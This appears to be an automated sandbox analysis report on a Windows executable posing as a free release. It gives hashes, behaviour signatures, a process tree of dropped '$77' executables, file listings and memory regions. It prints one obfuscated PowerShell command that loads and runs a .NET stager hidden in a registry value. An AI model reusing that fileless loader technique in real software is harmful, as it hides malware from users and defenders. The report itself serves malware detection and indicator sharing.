Analysis

  • max time kernel
    150s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    13-07-2024 08:28

General

  • Target

    KamiLib_Release.Free.2024.exe

  • Size

    96.1MB

  • MD5

    0f0d7c66b6b5432768b2c2cb4b5a5441

  • SHA1

    9cb05c3155d3d6adc10a6527da06f0655cb86789

  • SHA256

    089efc21429680f18c77d6e64cebd2d5884eed986c2f41442d7932ad1c0286a9

  • SHA512

    3b40fa9c884b657cf7d823e676a233e0f19a9bbc1df8ef99e79d346d8c5d7bc755a359ba8fe87306132dd9dd9ca6eab7bab4386b4366a8ca0ea46c4079d520b6

  • SSDEEP

    3145728:UD/al1bWhyIAKm4/CixAIhk94cYTn3TS3M:UD8cyIR/CiiN94cYK3

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 40 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Detects Pyinstaller 2 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:428
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{75bdc34d-a233-44d1-8f22-8e36f50cdcca}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4036
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:472
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:604
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              3⤵
                PID:1156
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe
                3⤵
                  PID:1532
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k RPCSS
                2⤵
                  PID:680
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                  2⤵
                  • Modifies security service
                  PID:760
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                  2⤵
                    PID:812
                    • C:\Windows\system32\Dwm.exe
                      "C:\Windows\system32\Dwm.exe"
                      3⤵
                        PID:1304
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs
                      2⤵
                        PID:848
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {F0CFB439-F0F7-4ECD-ACE4-CF93D57CB6A2} S-1-5-18:NT AUTHORITY\System:Service:
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2192
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            4⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3060
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService
                        2⤵
                          PID:968
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k NetworkService
                          2⤵
                            PID:276
                          • C:\Windows\System32\spoolsv.exe
                            C:\Windows\System32\spoolsv.exe
                            2⤵
                              PID:912
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                              2⤵
                                PID:348
                              • C:\Windows\system32\taskhost.exe
                                "taskhost.exe"
                                2⤵
                                  PID:1224
                                • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                  2⤵
                                    PID:1484
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                    2⤵
                                      PID:1088
                                    • C:\Windows\system32\sppsvc.exe
                                      C:\Windows\system32\sppsvc.exe
                                      2⤵
                                        PID:2132
                                    • C:\Windows\system32\lsass.exe
                                      C:\Windows\system32\lsass.exe
                                      1⤵
                                        PID:488
                                      • C:\Windows\system32\lsm.exe
                                        C:\Windows\system32\lsm.exe
                                        1⤵
                                          PID:496
                                        • C:\Windows\Explorer.EXE
                                          C:\Windows\Explorer.EXE
                                          1⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1348
                                          • C:\Users\Admin\AppData\Local\Temp\KamiLib_Release.Free.2024.exe
                                            "C:\Users\Admin\AppData\Local\Temp\KamiLib_Release.Free.2024.exe"
                                            2⤵
                                            • Loads dropped DLL
                                            • Suspicious use of WriteProcessMemory
                                            PID:1952
                                            • C:\Users\Admin\AppData\Local\Temp\$77Built.exe
                                              "C:\Users\Admin\AppData\Local\Temp\$77Built.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of WriteProcessMemory
                                              PID:2748
                                              • C:\Users\Admin\AppData\Local\Temp\$77Built.exe
                                                "C:\Users\Admin\AppData\Local\Temp\$77Built.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:1564
                                            • C:\Users\Admin\AppData\Local\Temp\$77C.exe
                                              "C:\Users\Admin\AppData\Local\Temp\$77C.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of WriteProcessMemory
                                              PID:2076
                                              • C:\Users\Admin\AppData\Local\Temp\$77C.exe
                                                "C:\Users\Admin\AppData\Local\Temp\$77C.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:1600
                                            • C:\Users\Admin\AppData\Local\Temp\$77Emp.exe
                                              "C:\Users\Admin\AppData\Local\Temp\$77Emp.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of WriteProcessMemory
                                              PID:3040
                                              • C:\Users\Admin\AppData\Local\Temp\$77Emp.exe
                                                "C:\Users\Admin\AppData\Local\Temp\$77Emp.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:3492
                                            • C:\Users\Admin\AppData\Local\Temp\$77Waltuhium.exe
                                              "C:\Users\Admin\AppData\Local\Temp\$77Waltuhium.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of WriteProcessMemory
                                              PID:1964
                                              • C:\Users\Admin\AppData\Local\Temp\$77Waltuhium.exe
                                                "C:\Users\Admin\AppData\Local\Temp\$77Waltuhium.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:888
                                            • C:\Users\Admin\AppData\Local\Temp\$77Install.exe
                                              "C:\Users\Admin\AppData\Local\Temp\$77Install.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:2284

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Temp\$77Install.exe

                                          Filesize

                                          163KB

                                          MD5

                                          1a7d1b5d24ba30c4d3d5502295ab5e89

                                          SHA1

                                          2d5e69cf335605ba0a61f0bbecbea6fc06a42563

                                          SHA256

                                          b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

                                          SHA512

                                          859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

                                        • C:\Users\Admin\AppData\Local\Temp\$77Waltuhium.exe

                                          Filesize

                                          11.8MB

                                          MD5

                                          d1e79c52e5c9bed7956f9aa1d3bfa20b

                                          SHA1

                                          d9d1c089ac5f9ae97b093501c0682f676eeeee0b

                                          SHA256

                                          01cee31a166be29a910c0780733ddc34221bb68c23582927e5304d581cd76eed

                                          SHA512

                                          aaf8197352310de3bc49390621cd9135c1f006868ba02c723829bcb17513dbf986b3177981cf4ef35871bda1c5992a575960723d56841830695c2259a25488cf

                                        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\pyinstaller-5.1.dist-info\INSTALLER

                                          Filesize

                                          4B

                                          MD5

                                          365c9bfeb7d89244f2ce01c1de44cb85

                                          SHA1

                                          d7a03141d5d6b1e88b6b59ef08b6681df212c599

                                          SHA256

                                          ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

                                          SHA512

                                          d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

                                        • C:\Users\Admin\AppData\Local\Temp\_MEI30402\jedi\third_party\typeshed\third_party\3\docutils\parsers\__init__.pyi

                                          Filesize

                                          63B

                                          MD5

                                          84a27291937d76e46b277653002601f2

                                          SHA1

                                          fe60efb40aeeee2998bb07245d4f9571ad08825f

                                          SHA256

                                          ddf071712a6926be84384714a23bdf946dc47a083b96fd90a7474d41020bacfe

                                          SHA512

                                          e489e83fd33fdc8ba88954725f79c2132bc4162ba713c72b190b790b4a368e3ceb024d7b8bceec4544123a5435fdfd987876f1b2542da06cba899f5ac72945be

                                        • C:\Users\Admin\AppData\Local\Temp\_MEI30402\parso\python\grammar39.txt

                                          Filesize

                                          7KB

                                          MD5

                                          fbbad176c79cc8670f9c2b4a0078b4fe

                                          SHA1

                                          b63c75589d719f28bb59b6ecab806d9b57701da9

                                          SHA256

                                          715ad56c5f4f8395092c58b6b6f2deb4f906f81380929a836bd86ab253634875

                                          SHA512

                                          15833d8c2df3fd51fc387a19c0880361cf9ff664da8ba33b6ee764bf6220634a151aae729db3f1e5b05aa3bc7c56782754d060fc7cc1af7a938dfe042a98a340

                                        • \Users\Admin\AppData\Local\Temp\$77Built.exe

                                          Filesize

                                          6.7MB

                                          MD5

                                          797808e7895624e7d47c16c6a487af9c

                                          SHA1

                                          11b817b34020efc955c1b8913d50fa9f98e972c4

                                          SHA256

                                          b499d95dfa440281aa044f0fed2410450682735fc08472c1ae7876d03178a9d3

                                          SHA512

                                          00c0f7b5e8d4b5e354d827fbbeec70781d83fe5cd12f058d842177ad41931545499b8d5319549357aa73d47c1d3e6172eea7e2f7cb16d2fa159288019166bc4f

                                        • \Users\Admin\AppData\Local\Temp\$77C.exe

                                          Filesize

                                          19.0MB

                                          MD5

                                          c5dfd8a888f767d43a58f7060e189217

                                          SHA1

                                          c148c987c1f256291de9d8306619a2bca92d752b

                                          SHA256

                                          c741bf69752091b7924c45e323a8774def261c9a9498003d34d895cc286978ff

                                          SHA512

                                          504000f167aa7a5579c174a7dd20561a077be42ce274274c61899604c959aa2ab1c1025128b001e5cf517f178d682c9f82b23786998e221f31f5dda53d3c00d3

                                        • \Users\Admin\AppData\Local\Temp\_MEI19642\api-ms-win-core-file-l1-2-0.dll

                                          Filesize

                                          21KB

                                          MD5

                                          1c58526d681efe507deb8f1935c75487

                                          SHA1

                                          0e6d328faf3563f2aae029bc5f2272fb7a742672

                                          SHA256

                                          ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

                                          SHA512

                                          8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

                                        • \Users\Admin\AppData\Local\Temp\_MEI19642\api-ms-win-core-file-l2-1-0.dll

                                          Filesize

                                          18KB

                                          MD5

                                          bfffa7117fd9b1622c66d949bac3f1d7

                                          SHA1

                                          402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

                                          SHA256

                                          1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

                                          SHA512

                                          b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

                                        • \Users\Admin\AppData\Local\Temp\_MEI19642\api-ms-win-core-localization-l1-2-0.dll

                                          Filesize

                                          21KB

                                          MD5

                                          724223109e49cb01d61d63a8be926b8f

                                          SHA1

                                          072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

                                          SHA256

                                          4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

                                          SHA512

                                          19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

                                        • \Users\Admin\AppData\Local\Temp\_MEI19642\api-ms-win-core-processthreads-l1-1-1.dll

                                          Filesize

                                          21KB

                                          MD5

                                          517eb9e2cb671ae49f99173d7f7ce43f

                                          SHA1

                                          4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

                                          SHA256

                                          57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

                                          SHA512

                                          492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

                                        • \Users\Admin\AppData\Local\Temp\_MEI19642\api-ms-win-core-timezone-l1-1-0.dll

                                          Filesize

                                          21KB

                                          MD5

                                          d12403ee11359259ba2b0706e5e5111c

                                          SHA1

                                          03cc7827a30fd1dee38665c0cc993b4b533ac138

                                          SHA256

                                          f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

                                          SHA512

                                          9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

                                        • \Users\Admin\AppData\Local\Temp\_MEI19642\python310.dll

                                          Filesize

                                          4.3MB

                                          MD5

                                          deaf0c0cc3369363b800d2e8e756a402

                                          SHA1

                                          3085778735dd8badad4e39df688139f4eed5f954

                                          SHA256

                                          156cf2b64dd0f4d9bdb346b654a11300d6e9e15a65ef69089923dafc1c71e33d

                                          SHA512

                                          5cac1d92af7ee18425b5ee8e7cd4e941a9ddffb4bc1c12bb8aeabeed09acec1ff0309abc41a2e0c8db101fee40724f8bfb27a78898128f8746c8fe01c1631989

                                        • \Users\Admin\AppData\Local\Temp\_MEI19642\ucrtbase.dll

                                          Filesize

                                          992KB

                                          MD5

                                          0e0bac3d1dcc1833eae4e3e4cf83c4ef

                                          SHA1

                                          4189f4459c54e69c6d3155a82524bda7549a75a6

                                          SHA256

                                          8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

                                          SHA512

                                          a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

                                        • \Users\Admin\AppData\Local\Temp\_MEI27482\python310.dll

                                          Filesize

                                          1.4MB

                                          MD5

                                          178a0f45fde7db40c238f1340a0c0ec0

                                          SHA1

                                          dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe

                                          SHA256

                                          9fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed

                                          SHA512

                                          4b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee

                                        • memory/428-2781-0x0000000000B40000-0x0000000000B6B000-memory.dmp

                                          Filesize

                                          172KB

                                        • memory/428-2776-0x0000000000B40000-0x0000000000B6B000-memory.dmp

                                          Filesize

                                          172KB

                                        • memory/428-2788-0x000007FEBF4D0000-0x000007FEBF4E0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/428-2789-0x0000000037970000-0x0000000037980000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/428-2787-0x0000000000B40000-0x0000000000B6B000-memory.dmp

                                          Filesize

                                          172KB

                                        • memory/428-2773-0x0000000000200000-0x0000000000225000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/428-2775-0x0000000000200000-0x0000000000225000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/472-2791-0x0000000000D00000-0x0000000000D2B000-memory.dmp

                                          Filesize

                                          172KB

                                        • memory/472-2797-0x0000000000D00000-0x0000000000D2B000-memory.dmp

                                          Filesize

                                          172KB

                                        • memory/472-2799-0x0000000037970000-0x0000000037980000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/472-2798-0x000007FEBF4D0000-0x000007FEBF4E0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/488-2812-0x000007FEBF4D0000-0x000007FEBF4E0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/488-2811-0x0000000000170000-0x000000000019B000-memory.dmp

                                          Filesize

                                          172KB

                                        • memory/488-2813-0x0000000037970000-0x0000000037980000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/488-2805-0x0000000000170000-0x000000000019B000-memory.dmp

                                          Filesize

                                          172KB

                                        • memory/496-2819-0x00000000002F0000-0x000000000031B000-memory.dmp

                                          Filesize

                                          172KB

                                        • memory/1564-152-0x000007FEF6780000-0x000007FEF6BEE000-memory.dmp

                                          Filesize

                                          4.4MB

                                        • memory/1564-5213-0x000007FEF6780000-0x000007FEF6BEE000-memory.dmp

                                          Filesize

                                          4.4MB

                                        • memory/1952-5211-0x000000007474E000-0x000000007474F000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1952-5212-0x0000000074740000-0x0000000074E2E000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/1952-0-0x000000007474E000-0x000000007474F000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1952-2-0x0000000074740000-0x0000000074E2E000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/1952-1-0x0000000000BF0000-0x0000000006C02000-memory.dmp

                                          Filesize

                                          96.1MB

                                        • memory/3060-1078-0x000000001A130000-0x000000001A412000-memory.dmp

                                          Filesize

                                          2.9MB

                                        • memory/3060-2391-0x00000000012F0000-0x000000000131A000-memory.dmp

                                          Filesize

                                          168KB

                                        • memory/3060-2393-0x0000000077710000-0x000000007782F000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/3060-2392-0x0000000077930000-0x0000000077AD9000-memory.dmp

                                          Filesize

                                          1.7MB

                                        • memory/3060-1080-0x0000000000980000-0x0000000000988000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/3492-2718-0x000007FEEED70000-0x000007FEEF1DE000-memory.dmp

                                          Filesize

                                          4.4MB

                                        • memory/4036-2768-0x0000000077930000-0x0000000077AD9000-memory.dmp

                                          Filesize

                                          1.7MB

                                        • memory/4036-2770-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/4036-2767-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/4036-2764-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/4036-2765-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/4036-2763-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/4036-2762-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/4036-2769-0x0000000077710000-0x000000007782F000-memory.dmp

                                          Filesize

                                          1.1MB